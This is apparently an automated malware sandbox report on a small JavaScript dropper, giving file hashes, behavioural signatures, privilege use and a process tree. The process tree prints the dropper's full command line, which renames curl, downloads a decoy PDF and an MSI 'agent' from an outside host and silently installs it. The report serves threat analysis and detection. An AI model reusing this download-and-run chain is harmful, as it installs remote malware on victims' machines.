Analysis
max time kernel: 134s
max time network: 126s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 06/06/2024, 02:00
Static task: static1
Behavioral task: behavioral1
  Sample: N-WITHERSPOON-86707.js
  Resource: win7-20231129-en
Behavioral task: behavioral2
  Sample: N-WITHERSPOON-86707.js
  Resource: win10v2004-20240508-en
General
Target: N-WITHERSPOON-86707.js
Size: 1KB
MD5: 97df66f95eced4fb840fd9d706d2763d
SHA1: 608f9e2389f4eaab66f584bd51f93ff3c3ed8a04
SHA256: 138265fa05533c8d6c8b9bb8686e00926bf5fa6f4b0d5b9a5ade065c5180a9db
SHA512: 2fbf85c74d3945330138d46518e34725800775644147f105deb4cbf0fdb06a4568f69fa1995d5967d95f2587b13a4b91e23524aab253a2adb58487296d156e57
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | wscript.exe
- Executes dropped EXE (2 IoCs)
  pid | Process
  4480 | TNheBOJElq.exe
  4656 | TNheBOJElq.exe
- Command and Scripting Interpreter: JavaScript (1 TTPs)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of AdjustPrivilegeToken (32 IoCs)
  description | pid | Process
  Token: SeShutdownPrivilege | 2316 | msiexec.exe
  Token: SeIncreaseQuotaPrivilege | 2316 | msiexec.exe
  Token: SeSecurityPrivilege | 3896 | msiexec.exe
  Token: SeCreateTokenPrivilege | 2316 | msiexec.exe
  Token: SeAssignPrimaryTokenPrivilege | 2316 | msiexec.exe
  Token: SeLockMemoryPrivilege | 2316 | msiexec.exe
  Token: SeIncreaseQuotaPrivilege | 2316 | msiexec.exe
  Token: SeMachineAccountPrivilege | 2316 | msiexec.exe
  Token: SeTcbPrivilege | 2316 | msiexec.exe
  Token: SeSecurityPrivilege | 2316 | msiexec.exe
  Token: SeTakeOwnershipPrivilege | 2316 | msiexec.exe
  Token: SeLoadDriverPrivilege | 2316 | msiexec.exe
  Token: SeSystemProfilePrivilege | 2316 | msiexec.exe
  Token: SeSystemtimePrivilege | 2316 | msiexec.exe
  Token: SeProfSingleProcessPrivilege | 2316 | msiexec.exe
  Token: SeIncBasePriorityPrivilege | 2316 | msiexec.exe
  Token: SeCreatePagefilePrivilege | 2316 | msiexec.exe
  Token: SeCreatePermanentPrivilege | 2316 | msiexec.exe
  Token: SeBackupPrivilege | 2316 | msiexec.exe
  Token: SeRestorePrivilege | 2316 | msiexec.exe
  Token: SeShutdownPrivilege | 2316 | msiexec.exe
  Token: SeDebugPrivilege | 2316 | msiexec.exe
  Token: SeAuditPrivilege | 2316 | msiexec.exe
  Token: SeSystemEnvironmentPrivilege | 2316 | msiexec.exe
  Token: SeChangeNotifyPrivilege | 2316 | msiexec.exe
  Token: SeRemoteShutdownPrivilege | 2316 | msiexec.exe
  Token: SeUndockPrivilege | 2316 | msiexec.exe
  Token: SeSyncAgentPrivilege | 2316 | msiexec.exe
  Token: SeEnableDelegationPrivilege | 2316 | msiexec.exe
  Token: SeManageVolumePrivilege | 2316 | msiexec.exe
  Token: SeImpersonatePrivilege | 2316 | msiexec.exe
  Token: SeCreateGlobalPrivilege | 2316 | msiexec.exe
- Suspicious use of WriteProcessMemory (8 IoCs)
  description | pid | Process | procid_target
  PID 4236 wrote to memory of 2512 | 4236 | wscript.exe | 92
  PID 4236 wrote to memory of 2512 | 4236 | wscript.exe | 92
  PID 2512 wrote to memory of 4480 | 2512 | cmd.exe | 94
  PID 2512 wrote to memory of 4480 | 2512 | cmd.exe | 94
  PID 2512 wrote to memory of 4656 | 2512 | cmd.exe | 95
  PID 2512 wrote to memory of 4656 | 2512 | cmd.exe | 95
  PID 2512 wrote to memory of 2316 | 2512 | cmd.exe | 96
  PID 2512 wrote to memory of 2316 | 2512 | cmd.exe | 96
Processes
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\N-WITHERSPOON-86707.js
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  PID: 4236
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\Admin\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\Admin\Documents\QMQjaBdqIo.pdf" https://in.corpmail.one/download/pdf & "C:\Users\Admin\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi https://in.corpmail.one/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
    Signatures: Suspicious use of WriteProcessMemory
    PID: 2512
    - C:\Users\Admin\AppData\Local\Temp\TNheBOJElq.exe
      TNheBOJElq.exe -o "C:\Users\Admin\Documents\QMQjaBdqIo.pdf" https://in.corpmail.one/download/pdf
      Signatures: Executes dropped EXE
      PID: 4480
    - C:\Users\Admin\AppData\Local\Temp\TNheBOJElq.exe
      TNheBOJElq.exe -o bLhLldebqq.msi https://in.corpmail.one/download/agent
      Signatures: Executes dropped EXE
      PID: 4656
    - C:\Windows\System32\msiexec.exe
      C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
      Signatures: Suspicious use of AdjustPrivilegeToken
      PID: 2316
- C:\Windows\system32\msiexec.exe
  C:\Windows\system32\msiexec.exe /V
  Signatures: Suspicious use of AdjustPrivilegeToken
  PID: 3896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4196,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=4264 /prefetch:8
  PID: 1780
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 411KB
  MD5: 1c3645ebddbe2da6a32a5f9fb43a3c23
  SHA1: 086f74a35d5afed78ae50cf5586fafffb7845464
  SHA256: 0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205
  SHA512: ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b